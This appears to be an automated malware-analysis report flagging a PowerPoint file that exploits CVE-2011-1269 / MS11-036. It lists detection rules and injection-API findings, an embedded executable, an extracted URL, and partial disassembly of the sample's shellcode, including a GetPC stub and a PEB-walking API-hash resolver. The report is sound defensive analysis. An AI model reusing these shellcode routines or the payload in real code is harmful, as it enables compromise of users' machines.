Verdict: MALICIOUS
Risk Score: 542
Malware Insights
MITRE ATT&CK: T1203 Exploitation for Client Execution
The sample is identified as a malicious PowerPoint file exploiting CVE-2011-1269 / MS11-036. It contains an embedded PE executable and uses process injection techniques (WriteProcessMemory, CreateRemoteThread) to execute shellcode. The ClamAV detection 'Win.Trojan.Exploit-110' further supports its malicious nature. The embedded URL is likely used for command and control or to download additional payloads.
Heuristics (13)
- PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family
  Severity: critical (CVE likely) | Rule: PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD
  A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
- ClamAV: Win.Trojan.Exploit-110
  Severity: critical | Rule: CLAMAV_DETECTION
  ClamAV detected this file as malware: Win.Trojan.Exploit-110
- Reference to WriteProcessMemory API
  Severity: critical | Rule: SC_STR_WRITEPROCESSMEMORY
  Reference to WriteProcessMemory API
- Reference to CreateRemoteThread API
  Severity: critical | Rule: SC_STR_CREATEREMOTETHREAD
  Reference to CreateRemoteThread API
- x86 GetPC stub (CALL $+5; POP EAX)
  Severity: high | Rule: SC_GETPC_CALL
  x86 GetPC stub (CALL $+5; POP EAX)
  Disassembly (attempted x86 opcode disassembly):
  00000F51 e800000000 call 0xf56
  00000F56 58 pop eax
  00000F57 83c005 add eax, 5
  00000F5A c3 ret
  00000F5B f3a4 rep movsb byte ptr es:[edi], byte ptr [esi]
  00000F5D 33c0 xor eax, eax
  00000F5F 8bcb mov ecx, ebx
  00000F61 f3aa rep stosb byte ptr es:[edi], al
  00000F63 5f pop edi
  00000F64 5e pop esi
  00000F65 ff7704 push dword ptr [edi + 4]
  00000F68 ff560c call dword ptr [esi + 0xc]
  00000F6B 8d9e4c020000 lea ebx, [esi + 0x24c]
  00000F71 53 push ebx
  00000F72 ff5624 call dword ptr [esi + 0x24]
  00000F75 c6040322 mov byte ptr [ebx + eax], 0x22
  00000F79 c644030100 mov byte ptr [ebx + eax + 1], 0
  00000F7E 83eb20 sub ebx, 0x20
  00000F81 c7431c65202022 mov dword ptr [ebx + 0x1c], 0x22202065
  00000F88 c74318742e6578 mov dword ptr [ebx + 0x18], 0x78652e74
  00000F8F c743146572706e mov dword ptr [ebx + 0x14], 0x6e707265
  00000F96 c7431020706f77 mov dword ptr [ebx + 0x10], 0x776f7020
  00000F9D c7430c74617274 mov dword ptr [ebx + 0xc], 0x74726174
  00000FA4 c743082f632073 mov dword ptr [ebx + 8], 0x7320632f
  00000FAB c7 .byte 0xc7
  00000FAC 43 inc ebx
  00000FAD 0465 add al, 0x65
  00000FAF 7865 js 0x1016
- PEB access via FS segment (x86)
  Severity: high | Rule: SC_PEB_ACCESS
  PEB access via FS segment (x86)
  Disassembly (attempted x86 opcode disassembly):
  00000FED 64a130000000 mov eax, dword ptr fs:[0x30]
  00000FF3 85c0 test eax, eax
  00000FF5 7813 js 0x100a
  00000FF7 3e8b400c mov eax, dword ptr ds:[eax + 0xc]
  00000FFB 3e8b701c mov esi, dword ptr ds:[eax + 0x1c]
  00000FFF 3e8b5e08 mov ebx, dword ptr ds:[esi + 8]
  00001003 ad lodsd eax, dword ptr [esi]
  00001004 3e8b6808 mov ebp, dword ptr ds:[eax + 8]
  00001008 eb0d jmp 0x1017
  0000100A 3e8b4034 mov eax, dword ptr ds:[eax + 0x34]
  0000100E 3e8ba8b8000000 mov ebp, dword ptr ds:[eax + 0xb8]
  00001015 33db xor ebx, ebx
  00001017 8bc5 mov eax, ebp
  00001019 5e pop esi
  0000101A 5d pop ebp
  0000101B c20400 ret 4
  0000101E 53 push ebx
  0000101F 55 push ebp
  00001020 56 push esi
  00001021 57 push edi
  00001022 368b6c2418 mov ebp, dword ptr ss:[esp + 0x18]
  00001027 368b453c mov eax, dword ptr ss:[ebp + 0x3c]
  0000102B 368b540578 mov edx, dword ptr ss:[ebp + eax + 0x78]
  00001030 03d5 add edx, ebp
  00001032 3e8b4a18 mov ecx, dword ptr ds:[edx + 0x18]
  00001036 3e8b5a20 mov ebx, dword ptr ds:[edx + 0x20]
  0000103A 03dd add ebx, ebp
  0000103C e338 jecxz 0x1076
  0000103E 49 dec ecx
  0000103F 3e8b348b mov esi, dword ptr ds:[ebx + ecx*4]
  00001043 03f5 add esi, ebp
  00001045 33ff xor edi, edi
  00001047 fc cld
  00001048 33c0 xor eax, eax
  0000104A ac lodsb al, byte ptr [esi]
  0000104B 3ac4 cmp al, ah
- PEB API-hash resolver
  Severity: high | Rule: SC_API_HASH_RESOLVER
  PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
  Disassembly: identical to the listing under SC_PEB_ACCESS above (same code region, starting at 00000FED).
- Reference to CreateProcess API
  Severity: high | Rule: SC_STR_CREATEPROCESS
  Reference to CreateProcess API
- Reference to LoadLibrary API
  Severity: high | Rule: SC_STR_LOADLIBRARY
  Reference to LoadLibrary API
- Reference to GetProcAddress API
  Severity: high | Rule: SC_STR_GETPROCADDRESS
  Reference to GetProcAddress API
- Embedded PE executable
  Severity: high | Rule: OLE_EMBEDDED_EXE
  MZ/PE header found inside document — possible embedded executable
- Reference to VirtualAlloc API
  Severity: medium | Rule: SC_STR_VIRTUALALLOC
  Reference to VirtualAlloc API
- Embedded URL
  Severity: info | Rule: EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://35.adsina.allyes (found in document text, OLE body)